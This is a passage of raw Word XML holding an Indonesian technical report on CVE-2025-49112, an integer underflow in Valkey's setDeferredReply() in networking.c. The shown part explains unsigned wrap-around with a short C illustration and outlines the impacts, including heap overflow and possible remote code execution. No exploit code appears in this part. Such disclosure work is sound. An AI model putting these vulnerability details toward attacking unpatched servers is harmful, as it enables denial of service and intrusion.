                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  Publicly Disclosed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="60061E4C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3B54A05D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:color="0A1628" w:sz="8"/>
              <w:left w:val="single" w:color="D8DDE6" w:sz="2"/>
              <w:bottom w:val="double" w:color="0A1628" w:sz="8"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
            <w:tcMar>
              <w:top w:w="260" w:type="dxa"/>
              <w:left w:w="400" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
              <w:right w:w="400" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FB267B7" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pP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0A1628"/>
                <w:spacing w:val="150"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">A  B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0A1628"/>
                <w:spacing w:val="150"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  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0A1628"/>
                <w:spacing w:val="150"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">S  T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0A1628"/>
                <w:spacing w:val="150"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  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0A1628"/>
                <w:spacing w:val="150"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">R  A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0A1628"/>
                <w:spacing w:val="150"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  K</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EAFD9C" wp14:textId="77777777">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:color="D0DCF0" w:sz="3" w:space="1"/>
              </w:pBdr>
              <w:spacing w:after="180"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="590E0563" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="180" w:line="388" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pP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Laporan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ini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menyajikan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analisis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teknis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mendalam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terhadap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kerentanan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CVE-2025-49112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ditemukan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pada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sistem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,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sebuah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proyek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open-source fork Redis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banyak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digunakan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sebagai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penyimpanan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data in-memory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berkecepatan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tinggi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Kerentanan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ini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terklasifikasi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sebagai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CWE-191 (Integer Underflow / Wrap-Around) dan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berlokasi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pada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fungsi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setDeferredReply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()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dalam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file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networking.c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Kondisi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kerentanan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terjadi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ketika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operasi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pengurangan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unsigned integer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antara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nilai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size dan used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menghasilkan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wrap-around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jika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used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melampaui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size,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menciptakan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nilai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yang sangat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besar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(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mendekati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2^32)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kemudian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digunakan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sebagai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ukuran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dalam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operasi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akses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memori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Dalam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kondisi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terburuk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,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eksploitasi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kerentanan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ini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dapat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menyebabkan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heap buffer overflow, out-of-bounds write, dan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potensi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eksekusi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kode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jarak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jauh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pada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sistem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menjalankan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tanpa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patch.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Laporan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ini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mencakup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: (1)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analisis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kode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sumber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dan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identifikasi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root cause; (2)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reproduksi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kerentanan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melalui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proof-of-concept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terverifikasi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; (3)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analisis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disassembly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menggunakan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Ghidra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; (4)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skenario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eksploitasi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lengkap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termasuk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heap grooming; (5)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identifikasi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forensic artifacts;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serta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(6)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rekomendasi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mitigasi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teknis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komprehensif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Penelitian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ini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dilakukan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mengikuti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prinsip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responsible disclosure dan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bertujuan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semata-mata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meningkatkan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kesadaran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komunitas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terhadap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pola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kerentanan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integer underflow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dalam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sistem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berbasis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C.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B94D5A5" wp14:textId="77777777">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:color="D8DDE6" w:sz="2" w:space="1"/>
              </w:pBdr>
              <w:spacing w:before="40" w:after="100"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="78AFDB22" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="5A6070"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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0A1628"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Kata 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0A1628"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Kunci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0A1628"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2025-49112, GHSA-xhp4-6g9v-4xvj, integer underflow, unsigned integer wrap-around,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22"/>
                <w:szCs w:val="22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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, heap buffer overflow,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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>networking.c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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">,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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>setDeferredReply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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, CWE-191, responsible disclosure,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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ghidra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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, binary analysis,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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>keamanan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22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>memori</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DEEC669" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3656B9AB" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="45FB0818" wp14:textId="77777777">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E312BA4" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB I: PENDAHULUAN DAN LATAR BELAKANG</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="1C9D1FBE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1.1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Tentang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Valkey</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="205B7347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Valkey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adalah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proyek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open-source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merupakan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fork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dari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Redis,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dikembangkan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di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bawah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naungan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Linux Foundation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setelah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Redis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mengubah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model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lisensinya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.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Valkey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mempertahankan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kompatibilitas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penuh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dengan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antarmuka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Redis dan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digunakan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secara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luas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sebagai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sistem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penyimpanan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key-value in-memory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berkecepatan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tinggi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dalam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berbagai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arsitektur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aplikasi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modern,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mulai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dari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caching, session management, message brokering,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hingga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real-time analytics.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="719B5ED7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Karena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posisi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sentral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Valkey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dalam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stack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infrastruktur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aplikasi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modern,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kerentanan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keamanan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pada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komponen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berpotensi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memengaruhi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jutaan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sistem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bergantung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padanya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secara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langsung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maupun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tidak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langsung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. Riset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keamanan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terhadap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Valkey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oleh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karenanya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memiliki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dampak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signifikan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terhadap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ekosistem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teknologi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secara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keseluruhan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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="2F6A08A2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1.2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Penemuan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dan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Konteks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Kerentanan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2CD580EA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Kerentanan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CVE-2025-49112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ditemukan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oleh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peneliti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keamanan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@odaysec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melalui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analisis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kode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sumber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Valkey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khususnya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pada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subsistem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jaringan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menangani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komunikasi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antar-komponen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dalam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mode cluster.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Kerentanan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termasuk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dalam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kategori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sering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diabaikan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namun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sangat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berbahaya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dalam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sistem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ditulis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dalam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bahasa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C: integer underflow pada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aritmetika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unsigned integer.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1B8A12CD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Pada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bahasa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C,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variabel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unsigned integer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tidak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menyimpan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negatif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. Ketika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pengurangan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menghasilkan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seharusnya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negatif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hasilnya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mengalami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wrap-around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menuju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maksimum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dari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tipe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data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tersebut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.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uint32_t,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adalah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4,294,967,295 (2^32 - 1). Nilai yang sangat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besar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kemudian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digunakan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sebagai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parameter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ukuran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dalam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memori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membuka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peluang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serangan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heap overflow.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="4BA613B2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1.3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Dampak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dan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Urgensi</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="049F31CB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5A3C4B40" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="10"/>
              <w:left w:val="single" w:color="C0392B" w:sz="10"/>
              <w:bottom w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEDEC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32DCC88" wp14:textId="692C5722">
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pP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C0392B"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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C0392B"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dampak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C0392B"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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C0392B"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Potensial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C0392B"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE-2025-49112</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="7633AB5A" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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Denial of Service (DoS): crash server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akibat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akses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memori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di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luar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batas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dialokasikan</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="1A7DFD5A" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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Heap Buffer Overflow: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penulisan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data di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luar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batas buffer heap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dapat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memengaruhi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metadata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alokasi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7010DE99" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/>
              <w:rPr/>
            </w:pP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Potensi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Remote Code Execution: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dalam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skenario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eksploitasi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terstruktur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dengan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heap grooming</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="725F1669" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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Data Corruption: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kerusakan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struktur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data in-memory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tidak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terduga</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="2ADE7305" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="110" w:line="340" w:lineRule="auto"/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Dampak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terhadap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seluruh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klien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terhubung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instance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terdampak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="53128261" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62486C05" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7487C49E" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB II: LANDASAN TEKNIS INTEGER UNDERFLOW</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="002AEB78" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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2.1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Memahami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Unsigned Integer Arithmetic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dalam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C</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="100E28D6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Bahasa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pemrograman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C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mendefinisikan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perilaku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aritmetika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pada unsigned integer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sebagai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modular arithmetic,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yaitu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dilakukan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modulo 2^N di mana N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adalah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lebar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bit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tipe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data. Ini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berarti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bahwa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menghasilkan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di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luar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rentang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representasi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tipe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data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tidak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menghasilkan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error,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melainkan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menghasilkan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hasil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di-wrap-around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secara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deterministik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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4101652C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661DCD79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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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D6B04F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0D20C278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uint32_t size = 50;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE1CBD2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uint32_t used = 100;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6959E7" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="280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17C54D86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uint32_t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remaining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= size - used;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100C5B58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30ECB8B0" wp14:textId="63B2816C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Hasil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bukan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-50,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melainkan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: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D19054A" wp14:textId="08DF23BB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50 - 100 = -50 (mod 2^32) = 4294967246 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3070A68B" wp14:textId="24D63420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Nilai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ini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digunakan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sebagai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ukuran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buffer = SANGAT BERBAHAYA </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="327E0EEA" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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6950F604" wp14:textId="77777777"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Ilustrasi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2.1 -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Perilaku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unsigned integer underflow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dalam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bahasa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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4B99056E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="6D8FDA59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2.2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Perbedaan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Signed vs Unsigned Integer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dalam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Konteks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Keamanan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1299C43A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4EEA54D5" w14:paraId="49EBC26E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569F69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KARAKTERISTIK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0C130C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PERBANDINGAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="08129E29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175B1867" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Signed Integer (int32_t)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7DC00CCF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsigned Integer (uint32_t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="3FD1035C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463812C2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Rentang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: -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2,147,483,648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s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.d.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+2,147,483,647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22AF801F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Rentang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: 0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s.d.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4,294,967,295</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="0ADF4462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4447DC71" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Overflow/Underflow = Undefined Behavior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131957CA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Overflow/Underflow = Wrap-Around (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didefinisikan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oleh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standar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C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="4227F6FD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7D6612EA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50 - 100 = -50 (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negatif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,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detektable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16A28B1D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50 - 100 = 4,294,967,246 (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positif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besar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,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tidak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terdeteksi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tanpa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guard)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="36540EE1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:rsidP="4EEA54D5" w14:paraId="3F39F2B0" wp14:textId="77777777">
            <w:pPr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Kondisi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if (result &gt; 0) BENAR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jika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positif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07B8DF9D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Kondisi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if (result &gt; 0) BENAR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nilai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underflow (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bahaya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!)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="67F5C007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66E4E840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Perbandingan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signed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lebih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aman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ukuran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buffer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18C7969E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Perbandingan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unsigned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rentan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jika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tidak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ada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validasi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pre-condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4DDBEF00" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="3383C615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2.3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Mengapa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Kondisi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ini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Tidak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Terdeteksi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oleh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Kompiler</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="778E921A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Kompiler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C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standar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tidak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mengeluarkan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warning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pengurangan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unsigned integer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berpotensi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underflow,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karena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dari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perspektif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bahasa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tersebut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adalah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perilaku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terdefinisikan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(well-defined behavior) dan legal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sepenuhnya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. Ini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menciptakan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kondisi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di mana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kode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berbahaya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secara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semantis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terlihat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benar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secara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sintaksis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dan lolos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dari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semua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pemeriksaan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kompiler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standar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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3461D779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6FA6E0B3" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="8B6914" w:sz="10"/>
              <w:left w:val="single" w:color="8B6914" w:sz="10"/>
              <w:bottom w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDFAE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251E497" wp14:textId="69867F25">
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pP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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Catatan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8B6914"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Teknis: C Standard Conformance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FC16DB" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="355" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pP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ISO/IEC 9899:2018 (C18) Pasal 6.2.5.9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mendefinisikan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bahwa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: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operasi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aritmetika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unsigned integer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tidak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pernah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overflow;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hasil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selalu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direduksi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modulo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angka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satu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lebih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besar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dari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nilai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terbesar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dapat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direpresentasikan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oleh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tipe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hasil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. Ini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berarti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wrap-around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adalah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perilaku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terdefinisikan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dan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tidak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dapat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di-detect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hanya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dengan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sanitizer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standar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tanpa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flag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khusus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seperti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-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fsanitize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=unsigned-integer-overflow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3CF2D8B6" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0FB78278" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="58790023" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB III: ANALISIS KODE SUMBER DAN IDENTIFIKASI ROOT CAUSE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="37F897D7" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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3.1  Lokasi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Kerentanan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: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networking.c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setDeferredReply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()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4BBCDC1D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Kerentanan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berlokasi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di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dalam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fungsi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setDeferredReply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() pada file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networking.c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.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Fungsi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bertanggung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jawab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menetapkan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balasan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ditangguhkan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(deferred reply)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dalam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konteks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komunikasi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jaringan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antar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-node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Valkey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. Pada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bagian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kritis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fungsi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terdapat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pengecekan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kondisi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menggunakan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pengurangan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unsigned integer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tanpa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validasi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pre-condition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memadai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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1FC39945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0562CB0E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D0DCF0" w:sz="2"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFD"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34CE0A4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CBC6D96" wp14:editId="7777777">
                  <wp:extent cx="8250000" cy="3479167"/>
                  <wp:effectExtent l="0" t="0" r="0" b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0000" cy="347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4EEA54D5" w14:paraId="391AAAD4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:left w:val="single" w:color="D0DCF0" w:sz="2"/>
              <w:bottom w:val="single" w:color="1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDF2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4713DD" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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Figure 1: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Analisis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Kode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Sumber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Valkey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- Lokasi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Kerentanan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pada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networking.c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(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setDeferredReply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) | CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62EBF3C5" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="37A5B913" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
